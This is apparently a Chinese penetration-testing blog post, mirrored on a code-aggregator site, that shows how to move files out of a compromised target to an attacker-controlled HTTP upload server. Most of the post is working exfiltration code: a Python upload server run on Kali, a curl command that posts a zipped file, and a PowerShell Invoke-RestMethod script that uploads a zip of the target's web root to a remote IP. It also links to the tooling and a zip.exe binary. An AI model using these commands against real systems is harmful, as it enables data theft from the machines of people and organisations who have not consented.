码迷,mamicode.com
首页 > Web开发 > 详细

HTTP传文件出网

时间:2018-03-09 10:36:47      阅读:248      评论:0      收藏:0      [点我收藏+]

标签:rest   机器   127.0.0.1   shel   load   .exe   pre   目标   发送   

在外网机器上运行文件服务接收服务


root@kali:~/pentest-script/FileTransfer/HttpServer# python3 SimpleHttpUpload.py Serving HTTP on 0.0.0.0 port 8000 ...
(True, "File ‘/root/pentest-script/FileTransfer/HttpServer/mo.zip‘ upload success!", ‘by: ‘, (‘127.0.0.1‘, 41170))
127.0.0.1 - - [09/Mar/2018 08:27:55] "POST / HTTP/1.1" 200 -

SimpleHTTPUpload.py


https://github.com/xiaoxiaoleo/pentest-script/blob/master/FileTransfer/HttpServer/SimpleHttpUpload.py

1. 如果是Linux在目标机器上执行CURL发送文件


root@kali:~/Desktop# zip test.zip test.txt 
  adding: test.txt (deflated 57%)

root@kali:~/Desktop# curl   -F file=@/root/Desktop/test.zip  http://127.0.0.1:8000/ 

2. 如果是windows机器, 可以使用Powershell上传文件

zip.exe -r temp.zip  wwwroot 


$fileName = "temp.zip"
$uri = "http://192.168.224.129:8000/"
$currentPath = Convert-Path .
$filePath="$currentPath\$fileName"
$fileBin = [System.IO.File]::ReadAlltext($filePath)
$bodyLines = ("------------------------83cdc2d56002d24a","Content-Disposition: form-data; name=`"file`"; filename=`"$fileName`"","Content-Type: application/octet-stream;",$fileBin,"--------------------------83cdc2d56002d24a--$LF" ) -join  "`r`n"

Invoke-RestMethod -Uri $uri -Method Post -ContentType "multipart/form-data; boundary=------------------------83cdc2d56002d24a" -Body $bodyLines
zip.exe 

https://github.com/xiaoxiaoleo/pentest-script/blob/6aadc3b7a4922f97015c309217feb239e179a995/bat/cmd%E5%8E%8B%E7%BC%A9%E8%A7%A3%E5%8E%8B/zip.exe

首发于t00ls

HTTP传文件出网

标签:rest   机器   127.0.0.1   shel   load   .exe   pre   目标   发送   

原文地址:https://www.cnblogs.com/xiaoxiaoleo/p/8531939.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!